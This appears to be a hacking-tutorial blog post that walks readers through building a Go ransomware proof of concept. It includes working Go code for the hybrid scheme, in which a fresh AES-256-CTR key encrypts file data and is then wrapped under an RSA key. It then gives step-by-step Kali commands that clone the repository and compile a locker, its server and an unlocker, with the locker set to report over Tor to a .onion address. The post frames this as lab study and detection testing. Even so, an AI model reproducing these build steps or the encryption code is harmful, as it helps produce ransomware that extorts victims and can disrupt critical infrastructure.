Welcome back, my aspiring cyberwarriors!
Ransomware is rapidly becoming the most damaging form of malware afflicting our digital systems. Companies across the globe are being hit with many variants, including Snake (also known as EKANS), which carries a kill list of SCADA/ICS processes so it can stop industrial software before encrypting. In May 2021, Colonial Pipeline in the US shut down its pipeline for nearly a week and paid the DarkSide group a ransom of roughly $4.4 million (75 bitcoin), demonstrating the danger ransomware poses to industrial operations and a nation's infrastructure. Around the same time, the major US insurer CNA reportedly paid a ransom of $40 million! No wonder ransomware developers are getting more creative and more malicious: ransomware pays.
To better understand how ransomware works, let's build our own from a Proof of Concept (POC) published by mauri870 on github.com. He developed it as part of his academic program; it is not designed for malicious purposes but to help us understand how ransomware works. Like Snake and a growing number of other malware families, it is written in Go (Golang).
This POC encrypts files in the background with AES-256-CTR and uses RSA-4096 to secure the data exchange with the server. This is the hybrid scheme used by most modern ransomware: a fast symmetric key encrypts the file contents, and an asymmetric key protects that symmetric key so the victim cannot recover it from the infected machine. The design is very similar to CryptoLocker, one of the most successful ransomware campaigns in history.
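To make the hybrid design concrete, here is an added Go example (written for this article, not code from mauri870's project) that does what the description above outlines: a fresh random AES-256 key encrypts the data in CTR mode, and that key is then wrapped with an RSA public key using OAEP, so only the holder of the matching private key can unwrap it and decrypt. The sample plaintext is constructed, and a 2048-bit RSA key is generated instead of 4096-bit purely to keep key generation fast; the mechanics are identical.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"fmt"
	"io"
)

// EncryptedData is what a locker would write to disk or send to its server:
// the AES key is never stored in the clear, only wrapped under the RSA public key.
type EncryptedData struct {
	WrappedKey []byte // 32-byte AES key encrypted with RSA-OAEP
	IV         []byte // 16-byte initial counter block for AES-CTR
	Ciphertext []byte
}

// EncryptData encrypts plaintext with a fresh AES-256 key in CTR mode and wraps
// that key with pub. A new key and IV are drawn per call: CTR mode is only safe
// when a (key, counter) pair is never reused, and it provides no integrity.
func EncryptData(pub *rsa.PublicKey, plaintext []byte) (*EncryptedData, error) {
	key := make([]byte, 32) // AES-256
	if _, err := io.ReadFull(rand.Reader, key); err != nil {
		return nil, err
	}
	iv := make([]byte, aes.BlockSize)
	if _, err := io.ReadFull(rand.Reader, iv); err != nil {
		return nil, err
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	ct := make([]byte, len(plaintext))
	cipher.NewCTR(block, iv).XORKeyStream(ct, plaintext)

	// Wrap the symmetric key under the operator's public key (OAEP with SHA-256).
	wrapped, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, pub, key, nil)
	if err != nil {
		return nil, err
	}
	return &EncryptedData{WrappedKey: wrapped, IV: iv, Ciphertext: ct}, nil
}

// DecryptData is the "unlocker" side: only the RSA private key can unwrap the
// AES key. With the wrong private key the OAEP padding check fails and an error
// is returned, which is exactly what keeps the victim from decrypting alone.
func DecryptData(priv *rsa.PrivateKey, ed *EncryptedData) ([]byte, error) {
	key, err := rsa.DecryptOAEP(sha256.New(), rand.Reader, priv, ed.WrappedKey, nil)
	if err != nil {
		return nil, err
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	pt := make([]byte, len(ed.Ciphertext))
	cipher.NewCTR(block, ed.IV).XORKeyStream(pt, ed.Ciphertext)
	return pt, nil
}

func main() {
	// Operator key pair; a real deployment would keep priv on the server only.
	priv, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		panic(err)
	}
	// Constructed sample standing in for a victim's document.
	plain := []byte("constructed sample: contents of quarterly-report.docx")

	ed, err := EncryptData(&priv.PublicKey, plain)
	if err != nil {
		panic(err)
	}
	got, err := DecryptData(priv, ed)
	if err != nil {
		panic(err)
	}
	fmt.Println("ciphertext differs from plaintext:", !bytes.Equal(ed.Ciphertext, plain))
	fmt.Println("decrypted matches original:", bytes.Equal(got, plain))

	// A different private key cannot unwrap the AES key.
	other, _ := rsa.GenerateKey(rand.Reader, 2048)
	_, err = DecryptData(other, ed)
	fmt.Println("wrong key rejected:", err != nil)
}
```

Two details matter for anyone analysing a sample like this: because the AES key is unique per run and only ever leaves the machine wrapped, memory forensics during the encryption window is the realistic recovery path; and because CTR mode carries no authentication, an unlocker that accepts tampered ciphertext will happily produce garbage.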
Step #1: Download the Source Code
The first step is to fire up Kali and make certain that Go (golang) is installed. If not, install it from the Kali repositories by entering:
kali > sudo apt install golang
Next, switch to the root user.
kali > sudo su -
Now create a directory for the source code. In this case, I named it simply "git".
kali > mkdir git
Next, change directory (cd) to this directory.
kali > cd git
Next, clone the source code from github.com.
kali > git clone https://github.com/mauri870/ransomware
Step #2: Export the Go Environment Variables
Next, we need to export the Go environment variables (typically GOPATH, the directory Go uses for the project's dependencies, and PATH, so the Go toolchain is found) in the same shell in which you will run make, so that the build can locate Go and the downloaded dependencies.
Step #3: Make the source code dependencies
Now, with the variables set and exported, we need to fetch the dependencies. Navigate to the new directory, ransomware, and enter make deps.
kali > cd ransomware
kali > make deps
Step #4: Build the Source Code with Options
Now that the dependencies are in place, we can build the source code. In our case, we will pass a few options to make.
First, USE_TOR=true routes the ransomware's communication with its server over the Tor network, which is required to reach a .onion address.
Second, SERVER_HOST points at our dark web server, hackersarisegtdj.onion (you can use any domain, or localhost for a purely local lab).
Third, SERVER_PORT sets the port the server listens on, in this case 80 (you can use any port).
Finally, GOOS selects the operating system the compiled binaries will run on, not the system you are compiling on. Here that is Linux; to produce Windows binaries, set GOOS=windows instead.
Our command should look something like this:
kali > make -e USE_TOR=true SERVER_HOST=hackersarisegtdj.onion SERVER_PORT=80 GOOS=linux
Now hit ENTER and watch your ransomware compile.
Step #5: Check the bin Directory for the Compiled Binaries
Once the build has finished, do a long listing on the ransomware directory.
kali > ls -l
Now, navigate to the bin directory.
kali > cd bin
Here, you will see the three build products: ransomware.exe (the locker), the server it reports to, and unlocker.exe (the decryptor). It is worth running file on them to confirm they were built for the GOOS you intended before copying anything to a test machine.
Step #6: Examine the Types of Files to be Encrypted
If you want to see what types of files this ransomware will encrypt, navigate to the cmd directory and open common.go.
kali > cd cmd
kali > more common.go
Here, you can see the list of file extensions the ransomware targets when executed; files whose extension is not on the list are left alone. Those lists are a useful indicator for defenders too, since they tell you which file types a given family considers worth holding hostage.
Ransomware is probably the greatest threat to our digital systems at this moment. As the Colonial Pipeline attack clearly demonstrated, nearly everyone is vulnerable, and when SCADA/ICS systems are compromised there can be significant economic and infrastructure ramifications!
This POC will help you better understand ransomware as a threat and test whether your systems and detections would catch such an attack. Run it only inside an isolated lab VM with a snapshot you can roll back to.
In the second part of this series, we will test this ransomware on a Windows VM.
If you or your team want to learn more about ransomware, our Ransomware training videos are available in our online store.